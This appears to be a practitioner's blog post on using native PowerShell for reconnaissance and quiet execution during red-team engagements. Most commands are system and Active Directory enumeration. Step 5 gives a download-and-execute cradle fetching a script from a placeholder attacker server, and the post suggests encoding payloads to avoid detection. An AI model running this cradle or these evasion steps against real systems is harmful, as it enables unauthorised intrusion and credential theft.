PowerShell in Red Teaming – What I Actually Do (Not What Blogs Tell You)
I used to hate PowerShell.
Not because it’s bad — but because every blog made it feel like:
“Here are 50 commands, go learn them.”
That’s not how it works in real engagements.
When you land on a Windows machine during a test, PowerShell is not “a tool” — it’s just… there. Already installed. Trusted. Quiet.
And that makes it one of the most useful things you have.
First Time I Actually Used It Properly
I had a low-priv shell on a domain-joined machine.
Nothing special:
- no admin
- no fancy access
- just a regular user
At that point, I didn’t want to drop anything. No uploads, no suspicious binaries.
So I opened PowerShell.
powershell
That’s it. No modules, no scripts.
And I started asking simple questions.
Step 1 – What Environment Am I In?
Instead of running tools, I just queried the system.
whoami
$env:USERDOMAIN
$env:COMPUTERNAME
PowerShell makes this kind of stuff easy. Cleaner than cmd, and more flexible.
Then:
Get-ComputerInfo | Select-Object CsDomain, WindowsVersion, OsArchitecture
Now I know:
- domain
- OS version
- architecture
Not exciting, but important.
Step 2 – Who Else Is Around?
This is where PowerShell starts being useful.
Get-LocalUser
Get-LocalGroupMember Administrators
Then I check sessions:
quser
If I see an admin session here, everything changes.
But let’s say — nothing interesting.
So I keep going.
Step 3 – Domain Enumeration Without Dropping Tools
This is where most people upload something like BloodHound.
I don’t do that immediately anymore.
PowerShell can already talk to Active Directory if RSAT tools are present.
Get-ADDomain
Get-ADUser -Filter * | Select-Object SamAccountName
If those work, great.
If not, I fallback to .NET:
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).Name
No modules needed.
Step 4 – Finding Interesting Accounts
I’m not looking for all users. I’m looking for useful ones.
Service accounts:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Accounts with weird descriptions:
Get-ADUser -Filter * -Properties Description | Where-Object {$_.Description -like "*pass*"}
This is the kind of thing that doesn’t show up in “top 10 commands” lists — but works surprisingly often.
People leave things in descriptions. Notes. Hints. Sometimes even passwords.
Step 5 – Execution Without Dropping Files
One of the biggest advantages of PowerShell is this:
You don’t need to write files to disk.
Example:
IEX (New-Object Net.WebClient).DownloadString('http://<your-server>/script.ps1')
This is old, well-known — but still useful in the right situation.
But here’s the thing most blogs don’t say:
This is also monitored a lot.
So I don’t use it blindly.
Sometimes I:
- encode payloads
- split execution
- or just avoid it completely
Because PowerShell is powerful — but also watched.
Step 6 – Living Off the Land
The real strength of PowerShell is not flashy scripts.
It’s this:
You can do a lot without introducing anything new.
Examples:
Check running processes:
Get-Process
Find interesting services:
Get-Service | Where-Object {$_.Status -eq "Running"}
Look for scheduled tasks:
Get-ScheduledTask
Every one of these can lead somewhere:
- misconfigurations
- credentials
- escalation paths
Step 7 – Where People Go Wrong
Most beginners treat PowerShell like this:
“Cool, I can run scripts now.”
That’s not the point.
The point is:
- blending in
- using native functionality
- avoiding detection
If you drop 10 scripts in the first 5 minutes, you lose that advantage.
Real Talk – PowerShell in 2026
Let’s be honest.
PowerShell is:
- heavily logged (Script Block Logging, AMSI)
- monitored by EDR
- well understood by defenders
So does that make it useless?
No.
It just means:
You need to be smarter about how you use it.
How I Use It Now
Not as a “weapon”.
More like:
- reconnaissance tool
- environment probe
- quick executor
And only when needed:
- loader
- automation layer
Final Thought
PowerShell is not impressive.
It doesn’t give you instant shells or flashy exploits.
But it gives you something more valuable:
Control without noise
And in a real red team engagement, that matters more than anything.
Next time, I’ll probably go deeper into:
- bypassing logging (realistically, not YouTube-style)
- or combining PowerShell with AD enumeration + BloodHound
Because that’s where things start getting interesting.
